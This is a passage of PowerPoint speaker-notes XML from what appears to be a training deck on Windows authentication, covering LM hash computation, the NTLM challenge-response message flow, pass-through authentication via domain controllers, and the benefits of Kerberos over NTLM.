                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> keys, one from each 7-byte half, by converting the seven bytes into a bit stream with the most significant bit first, and inserting a null bit after every seven bits (so 1010100 becomes10101000). This generates the 64 bits needed for a DES key. (A DES key ostensibly consists of 64 bits; however, only 56 of these are actually used by the algorithm. The null bits added in this step are later discarded.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Each of the two keys is used to DES-encrypt the constant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId11" tooltip="ASCII"/>
              </a:rPr>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> string “KGS!@#$%”,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>[Notes 2]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> resulting in two 8-byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ciphertext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> values. The DES </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>CipherMode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> should be set to ECB, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>PaddingMode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> should be set to NONE.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>These two </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ciphertext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> values are concatenated to form a 16-byte value, which is the LM hash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="he-IL"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88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19074206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89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209274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59659315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pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Connection-oriented NTLM message flow </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application-specific protocol messages are sent between client and server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The NTLM protocol begins when the application requires an authenticated session. The client sends an NTLM NEGOTIATE_MESSAGE message to the server. This message specifies the desired security features of the session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The server sends an NTLM CHALLENGE_MESSAGE message to the client. The message includes agreed upon security features, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> that the server generates.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The client sends an NTLM AUTHENTICATE_MESSAGE message to the server. The message contains the name of a user and a response that proves that the client has the user's password. The server validates the response sent by the client. If the user name is for a local account, it can validate the response by using information in its local account database. If the user name is for a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> account, it can validate the response by sending the user authentication information (the user name, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>challenge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> sent to the client, and the response received from the client) to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>domain controller (DC)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> that can validate the response. (Section </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>3.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>[MS-APDS]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>). The NTLM protocol completes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>If the challenge and the response prove that the client has the user's password, the authentication succeeds and the application protocol continues according to its specification. If the authentication fails, the server may send the status in an application protocol–specified way, or it may simply terminate the connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="he-IL"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90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414332291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When the user attempts to access a resource on a network with NTLM authentication, the following process occurs:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>The user attempts to access a resource.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>The file server in the resource domain passes the user's credentials to a domain controller in the resource domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>The  DC in the resource domain passes the user's credentials to a DC in the account domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>The DC in the account domain adds global groups to the token, and passes the updated token list to a GC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>The GC server adds universal groups to the token and passes the updated token list back to the domain controller in the account domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>The DC in the account domain passes the updated token list back to the domain controller in the resource domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>The DC in the resource domain adds domain local groups to the token and passes the updated token list to the resource server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>The resource domain file server adds machine local groups to the token.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netlogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has a "throttle" that controls the max number of calls over secure channel we'll do at once. On DCs this can translate to calls over secure channels to external trusted domains. On member servers / workstations this can be to authenticating DC for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>intraforest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> requests or requests to other domains/forests.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="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91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30422410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http://windowsitpro.com/security/comparing-windows-kerberos-and-ntlm-authentication-protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Kerberos Authentication Benefits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>The Kerberos V5 protocol is more secure, more flexible, and more efficient than NTLM. The benefits gained by using Kerberos authentication are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Delegated authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Windows services impersonate a client when accessing resources on the client’s behalf. In many cases, a service can complete its work for the client by accessing resources on the local computer. Both NTLM and the Kerberos V5 protocol provide the information that a service needs to impersonate its client locally. However, some distributed applications are designed so that a front-end service must impersonate clients when connecting to back-end services on other computers. The Kerberos V5 protocol includes a proxy mechanism that enables a service to impersonate its client when connecting to other services. No equivalent is available with NTLM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Interoperability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Microsoft’s implementation of the Kerberos V5 protocol is based on standards-track specifications that are recommended to the Internet Engineering Task Force (IETF). As a result, the implementation of the Kerberos V5 protocol in Windows Server 2003 lays a foundation for interoperability with other networks in which the Kerberos V5 protocol is used for authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>More efficient authentication to servers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>With NTLM authentication, an application server must connect to a domain controller in order to authenticate each client. With the Kerberos V5 authentication protocol, on the other hand, the server is not required to go to a domain controller. Instead, the server can authenticate the client by examining credentials presented by the client. Clients can obtain credentials for a particular server once and then reuse those credentials throughout a network logon session. Renewable session tickets replace pass-through authentication. For more information about what renewable session tickets are and how they work, please see “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>How the Kerberos Version 5 Authentication Protocol Works</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Mutual authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>By using the Kerberos protocol, a party at either end of a network connection can verify that the party on the other end is the entity it claims to be. Although NTLM enables servers to verify the identities of their clients, NTLM does not enable clients to verify a server’s identity, nor does NTLM enable one server to verify the identity of another. NTLM authentication was designed for a network environment in which servers were assumed to be genuine. The Kerberos V5 protocol makes no such assumption.</a:t>
            </a:r>
          </a:p>
          <a:p>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92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31289080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http://windowsitpro.com/security/comparing-windows-kerberos-and-ntlm-authentication-protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Kerberos Authentication Benefits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>The Kerberos V5 protocol is more secure, more flexible, and more efficient than NTLM. The benefits gained by using Kerberos authentication are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Delegated authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Windows services impersonate a client when accessing resources on the client’s behalf. In many cases, a service can complete its work for the client by accessing resources on the local computer. Both NTLM and the Kerberos V5 protocol provide the information that a service needs to impersonate its client locally. However, some distributed applications are designed so that a front-end service must impersonate clients when connecting to back-end services on other computers. The Kerberos V5 protocol includes a proxy mechanism that enables a service to impersonate its client when connecting to other services. No equivalent is available with NTLM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Interoperability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Microsoft’s implementation of the Kerberos V5 protocol is based on standards-track specifications that are recommended to the Internet Engineering Task Force (IETF). As a result, the implementation of the Kerberos V5 protocol in Windows Server 2003 lays a foundation for interoperability with other networks in which the Kerberos V5 protocol is used for authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>More efficient authentication to servers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>With NTLM authentication, an application server must connect to a domain controller in order to authenticate each client. With the Kerberos V5 authentication protocol, on the other hand, the server is not required to go to a domain controller. Instead, the server can authenticate the client by examining credentials presented by the client. Clients can obtain credentials for a particular server once and then reuse those credentials throughout a network logon session. Renewable session tickets replace pass-through authentication. For more information about what renewable session tickets are and how they work, please see “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>How the Kerberos Version 5 Authentication Protocol Works</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Mutual authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>By using the Kerberos protocol, a party at either end of a network connection can verify that the party on the other end is the entity it claims to be. Although NTLM enables servers to verify the identities of their clients, NTLM does not enable clients to verify a server’s identity, nor does NTLM enable one server to verify the identity of another. NTLM authentication was designed for a network environment in which servers were assumed to be genuine. The Kerberos V5 protocol makes no such assumption.</a:t>
            </a:r>
          </a:p>
          <a:p>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93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7502904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94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8305781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D0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291035325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CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235109648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97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
